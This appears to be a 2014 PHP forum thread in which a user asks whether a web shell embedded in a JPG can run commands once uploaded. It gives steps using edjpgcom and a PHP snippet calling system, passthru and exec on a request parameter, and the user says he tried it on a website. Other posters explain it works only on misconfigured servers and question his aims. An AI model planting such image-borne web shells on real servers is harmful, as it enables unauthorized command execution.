Page 1 of 1

is it impossible???

Posted: Thu Jun 19, 2014 7:49 am
by M0TRIX
hello

follow the steps:

1_download edjpgcom.exe program.

2_drag the jpg file in the edjpgcom program the u can put your cods into the jpg file

3_put these codes into it :

Code: Select all

 <?PHP 
system($cmd);
passthru($cmd);
exec($cmd);
?>
>

4_upload the jpg file.

5_run it like this image.jpg?cmd=ls

do u think is it possible to run command with this method??? or other extense of image files like png gif etc..

Re: is it impossible???

Posted: Thu Jun 19, 2014 12:19 pm
by Weirdan
That's possible, however only if the webserver is misconfigured to process image files through php. Another exploit vector would exploiting attacker-controlled includes, but if that's possible it would itself be a security issue.

Re: is it impossible???

Posted: Thu Jun 19, 2014 5:00 pm
by M0TRIX
i've test it on a website.i just see the picture !!!but no command works!! why????there is php cod in it. it should work

i put <php and ?> characters in it.the webserver should recgnize it as a php file.huu??

is there any way to run our command with the picture??

so what is "edjpgcom.exe"(first post) program for?

Re: is it impossible???

Posted: Thu Jun 19, 2014 6:47 pm
by Celauran
What are you trying to do here? Having shell_exec and/or exec enabled on a server is a pretty terrible idea.